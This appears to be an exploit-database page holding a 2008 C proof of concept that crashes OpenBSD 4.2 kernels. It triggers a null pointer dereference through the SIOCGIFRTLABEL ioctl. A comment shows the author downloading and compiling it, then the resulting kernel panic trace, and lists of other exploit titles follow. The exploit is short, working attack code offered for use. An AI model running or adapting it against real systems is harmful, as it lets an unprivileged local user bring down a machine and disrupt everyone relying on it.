Menu

Search for hundreds of thousands of exploits

"OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service"

Author

Exploit author

Hunger

Platform

Exploit platform

bsd

Release date

Exploit published date

2008-01-18

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
/*
 * OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl]
 * Null Pointer Dereference local Denial of Service Exploit
 *
 * by Hunger <rtlabdos@hunger.hu>
 *
 * Advisory:
 * http://marc.info/?l=openbsd-security-announce&m=120007327504064
 *
 * FOR TESTING PURPOSES ONLY!
 *
 * $ uname -mrsv
 * OpenBSD 4.2 GENERIC#375 i386
 * $ id
 * uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
 * $ ftp -V http://hunger.hu/rtlabdos.c
 * 100% |******************************************|  1814        00:00
 * $ gcc rtlabdos.c -o rtlabdos
 * $ ./rtlabdos
 * uvm_fault(0xd617865e0, 0x0, 0, 1) -> e
 * kernel: page fault trap, code=0
 * Stopped at      strlcpy+0x1c:    movb     0(%edx),%al
 * ddb> trace
 * strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c
 * ifioctl(d6033280,c0206983,d826fe78,d616696c,d61772a0) at ifioctl+0xa0d
 * sys_ioctl(d616696c,d826ff68,d826ff58,1c000680,73) at sys_ioctl+0x125
 * syscall() at syscall+0x24a
 * --- syscall (number 54) ---
 * 0xf557d1:
 * ddb> show registers
 * ds                  0x10
 * es                  0x10
 * fs                  0x58
 * gs                  0x10
 * edi                    0
 * esi                 0x20
 * ebp           0xd826fd60        end+0x7a33a90
 * ebx           0xd826fd98        end+0x7a33ac8
 * edx                    0
 * ecx                 0x1f
 * eax                    0
 * eip           0xd064acb0        strlcpy+0x1c
 * cs                   0x8
 * eflags           0x10212
 * esp           0xd826fd54        end+0x7a33a84
 * ss            0xd8260010        end+0x7a23d40
 * strlcpy+0x1c:   movb    0(%edx),%al
 * 
 */

#include <sys/param.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>

int
main(void)
{
struct ifreq ifr = { .ifr_name = "lo0" };

return ioctl(socket(AF_INET, SOCK_DGRAM, 0), SIOCGIFRTLABEL, &ifr);
}

// milw0rm.com [2008-01-18]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-11-06 "Morris Worm - fingerd Stack Buffer Overflow (Metasploit)" remote bsd Metasploit
2016-07-21 "NetBSD - 'mail.local(8)' Local Privilege Escalation" local bsd akat1
2015-09-28 "Watchguard XCS - FixCorruptMail Privilege Escalation (Metasploit)" local bsd Metasploit
2015-09-28 "Watchguard XCS - Remote Command Execution (Metasploit)" remote bsd Metasploit
2015-04-21 "OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)" dos bsd nitr0us
2014-12-02 "tnftp (FreeBSD 8/9/10) - 'tnftp' Client Side" remote bsd dash
2014-11-06 "Citrix Netscaler SOAP Handler - Remote Code Execution (Metasploit)" remote bsd Metasploit
2014-10-25 "OpenBSD 5.5 - Local Kernel Panic (Denial of Service)" dos bsd nitr0us
2012-11-22 "OpenBSD 4.x - Portmap Remote Denial of Service" dos bsd auto236751
2012-07-01 "BSD - 'TelnetD' Remote Command Execution (2)" remote bsd kingcope
Release Date Title Type Platform Author
2013-06-21 "FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Local Privilege Escalation" local freebsd Hunger
2008-12-22 "Roundcube Webmail 0.2b - Remote Code Execution" webapps php Hunger
2008-01-18 "OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service" dos bsd Hunger
2005-11-08 "Linux chfn (SuSE 9.3/10) - Local Privilege Escalation" local linux Hunger 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected